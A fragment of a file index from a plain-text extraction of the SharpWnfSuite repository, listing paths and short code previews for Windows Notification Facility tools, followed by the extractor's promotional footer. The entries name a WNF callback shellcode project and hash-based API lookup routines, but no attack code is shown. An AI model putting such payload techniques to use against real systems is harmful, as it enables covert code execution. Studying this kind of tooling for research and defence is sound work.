"preview": "using System;\n\nnamespace SharpWnfScan.Interop\n{\n [Flags]\n internal enum ACCESS_MASK : uint\n {\n // For P"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/Win32Structs.cs",
"chars": 20245,
"preview": "using System;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace SharpWnfScan.Interop\n{\n using NTST"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Library/Globals.cs",
"chars": 1275,
"preview": "using System;\n\nnamespace SharpWnfScan.Library\n{\n internal class Globals\n {\n public static IntPtr Subscript"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Library/Header.cs",
"chars": 293,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfScan.Library\n{\n [StructLayout(LayoutKind.Sequ"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Library/Helpers.cs",
"chars": 38475,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Runtime.InteropServices;\nusing System.Tex"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Library/Modules.cs",
"chars": 15328,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\nusing Sy"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Library/Utilities.cs",
"chars": 26658,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Runtime.InteropServices;\nusing System.Security.Principal;\n"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Properties/AssemblyInfo.cs",
"chars": 1392,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "SharpWnfSuite/SharpWnfScan/SharpWnfScan.cs",
"chars": 1695,
"preview": "using System;\nusing System.Collections.Generic;\nusing SharpWnfScan.Handler;\n\nnamespace SharpWnfScan\n{\n internal clas"
},
{
"path": "SharpWnfSuite/SharpWnfScan/SharpWnfScan.csproj",
"chars": 3794,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "SharpWnfSuite/SharpWnfServer/App.config",
"chars": 180,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".NET"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Handler/CommandLineParser.cs",
"chars": 15521,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Text;\n\nnamespace SharpWnfServer.Handler\n{\n internal cla"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Handler/Execute.cs",
"chars": 1169,
"preview": "using System;\nusing System.Text;\nusing SharpWnfServer.Library;\n\nnamespace SharpWnfServer.Handler\n{\n internal class E"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/NativeMethods.cs",
"chars": 2719,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfServer.Interop\n{\n using NTSTATUS = Int32;\n\n "
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1507.cs",
"chars": 13417,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1507 : ulong\n {\n WNF_BRU_BACKUP = 0x"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1511.cs",
"chars": 37107,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1511 : ulong\n {\n WNF_BI_BI_READY = 0"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1607.cs",
"chars": 47112,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1607 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1703.cs",
"chars": 54946,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1703 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1709.cs",
"chars": 61985,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1709 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1803.cs",
"chars": 69122,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1803 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1809.cs",
"chars": 73166,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1809 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1903To1909.cs",
"chars": 77232,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong\n {\n WNF_A2A_APP"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName2004To21H1.cs",
"chars": 82064,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong\n {\n WNF_9P_REDI"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName2022.cs",
"chars": 86966,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2022 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName21H2.cs",
"chars": 88852,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName22H2.cs",
"chars": 92111,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName23H2.cs",
"chars": 94515,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName24H2.cs",
"chars": 97458,
"preview": "namespace SharpWnfServer.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/Win32Consts.cs",
"chars": 354,
"preview": "using System;\n\nnamespace SharpWnfServer.Interop\n{\n using NTSTATUS = Int32;\n\n internal class Win32Consts\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/Win32Enums.cs",
"chars": 4954,
"preview": "using System;\n\nnamespace SharpWnfServer.Interop\n{\n [Flags]\n internal enum ACCESS_MASK : uint\n {\n // For"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Interop/Win32Structs.cs",
"chars": 8535,
"preview": "using System;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace SharpWnfServer.Interop\n{\n [StructL"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Library/HexDump.cs",
"chars": 4135,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfServer.Library\n{\n internal"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Library/WnfCom.cs",
"chars": 22868,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\nusing SharpWnfServer.Interop;\nusing System.Colle"
},
{
"path": "SharpWnfSuite/SharpWnfServer/Properties/AssemblyInfo.cs",
"chars": 1396,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "SharpWnfSuite/SharpWnfServer/SharpWnfServer.cs",
"chars": 811,
"preview": "using System;\nusing SharpWnfServer.Handler;\n\nnamespace SharpWnfServer\n{\n internal class SharpWnfServer\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfServer/SharpWnfServer.csproj",
"chars": 3627,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "SharpWnfSuite/SharpWnfSuite.sln",
"chars": 3571,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3182"
},
{
"path": "WnfCallbackPayload/README.md",
"chars": 12853,
"preview": "# Building Shellcode for WNF Callback \n\nFor memo purpose, we describe things about WNF Callback shellcode in C/C++ with "
},
{
"path": "WnfCallbackPayload/WnfCallbackPayload/WnfCallbackPayload.c",
"chars": 4411,
"preview": "#define WIN32_LEAN_AND_MEAN\n#include <windows.h>\n#include <winnt.h>\n#include <winternl.h>\n\n//\n// Windows Definitions\n//\n"
},
{
"path": "WnfCallbackPayload/WnfCallbackPayload/WnfCallbackPayload.vcxproj",
"chars": 12317,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "WnfCallbackPayload/WnfCallbackPayload/WnfCallbackPayload.vcxproj.filters",
"chars": 1037,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "WnfCallbackPayload/WnfCallbackPayload/WnfCallbackPayload.vcxproj.user",
"chars": 163,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "WnfCallbackPayload/WnfCallbackPayload/function_order.txt",
"chars": 95,
"preview": "WnfCallback\nCalcAnsiStringHash\nCalcUnicodeStringHash\nGetModuleHandleByHash\nGetProcAddressByHash"
},
{
"path": "WnfCallbackPayload/WnfCallbackPayload.sln",
"chars": 1294,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.4.3321"
}
]
About this extraction
This page contains the full source code of the daem0nc0re/SharpWnfSuite GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 169 files (5.3 MB), approximately 1.4M tokens, and a symbol index with 834 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.